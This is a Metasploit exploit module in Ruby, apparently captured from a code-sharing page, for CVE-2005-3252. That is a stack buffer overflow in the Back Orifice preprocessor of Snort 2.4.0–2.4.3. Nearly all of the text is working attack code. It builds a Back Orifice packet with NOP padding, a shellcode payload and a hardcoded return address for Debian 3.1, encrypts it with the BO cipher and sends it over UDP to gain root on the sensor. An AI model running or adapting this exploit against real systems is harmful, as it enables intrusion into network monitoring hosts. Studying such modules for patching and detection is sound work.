Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Snort Back Orifice Pre-Preprocessor Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the Back Orifice pre-processor module
16
        included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
17
        be used to completely compromise a Snort sensor, and would typically gain an attacker
18
        full root or administrative privileges.
19
      },
20
      'Author'         => 'KaiJern Lau <xwings[at]mysec.org>',
21
      'License'        => BSD_LICENSE,
22
      'References'     =>
23
        [
24
          ['CVE', '2005-3252'],
25
          ['OSVDB', '20034'],
26
          ['BID', '15131']
27
        ],
28
      'Payload'        =>
29
        {
30
          'Space'    => 1073, #ret : 1069
31
          'BadChars' => "\x00",
32
        },
33
      'Platform'       => %w{ linux },
34
      'Targets'        =>
35
        [
36
          # Target 0: Debian 3.1 Sarge
37
          [
38
            'Debian 3.1 Sarge',
39
            {
40
              'Platform' => 'linux',
41
              'Ret'      => 0xbffff350
42
            }
43
          ],
44
        ],
45
      'DefaultTarget' => 0,
46
      'DisclosureDate' => '2005-10-18'))
47

48
    # Configure the default port to be 9080
49
    register_options(
50
      [
51
        Opt::RPORT(9080),
52
      ])
53
  end
54

55
  def msrand(seed)
56
    @holdrand = 31337
57
    end
58

59
  def mrand()
60
    return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
61
    end
62

63
  def bocrypt(takepayload)
64

65
    @arrpayload = (takepayload.split(//))
66

67
    encpayload = ""
68
    @holdrand=0
69
    msrand(0)
70

71
    @arrpayload.each do |c|
72
      encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
73
    end
74

75
    return encpayload
76
    end
77

78

79
  def exploit
80
    connect_udp
81

82
    boheader =
83
      "*!*QWTY?"  +
84
      [1096].pack("V")  +           # Length ,thanx Russell Sanford
85
      "\xed\xac\xef\x0d"+           # ID
86
      "\x01"                        # PING
87

88
    filler =
89
      make_nops(1069 -(boheader.length + payload.encode.length))
90

91
    udp_sock.write(
92
      bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
93
    )
94

95
    handler
96
    disconnect_udp
97
  end
98
end
99

100